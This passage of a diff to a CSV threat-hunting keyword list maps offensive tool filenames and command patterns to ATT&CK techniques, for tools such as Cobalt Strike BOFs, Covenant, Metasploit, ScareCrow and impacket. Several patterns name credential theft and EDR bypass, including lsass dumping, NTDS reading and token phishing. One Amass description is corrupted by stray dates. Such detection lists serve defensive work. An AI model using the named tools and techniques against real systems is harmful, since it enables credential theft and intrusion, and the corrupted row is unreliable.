T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" -"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. 
recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" "*calebstewart/pwncat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*-CalendarNTLMLeak*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*CALLBACK_HASHDUMP*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" 
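Review bot: The rewritten `*caffix/amass*` row keeps a garbled `metadata_description`: `recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering`. It looks as if a date string replaced the list separators, although that cannot be confirmed from the diff. Restoring the separators in the file's own style would fix it, e.g. `recursive brute forcing - crawling of web archives - name altering and reverse DNS sweeping`. The two Amass rows in this hunk also give different descriptions and technique or tactic sets for the same repository. Aligning them would keep ATT&CK tagging consistent for analysts who pivot on the tool name.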
@@ -8260,36 +8407,36 @@ "*CALLBACK_TOKEN_STOLEN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*CallBackDump*dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*CallbackDump.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" -"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*CandyPotato.exe *","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*canix1/ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*CaptainNox/Hypnos*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" "*captcha-killer.*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" 
+"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*CarbonCopy*","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. 
Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1185","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" "*CarbonCopy.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*cargo install glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*carlospolop/PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*cat *.bin | base64 -w 0 > *.txt*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
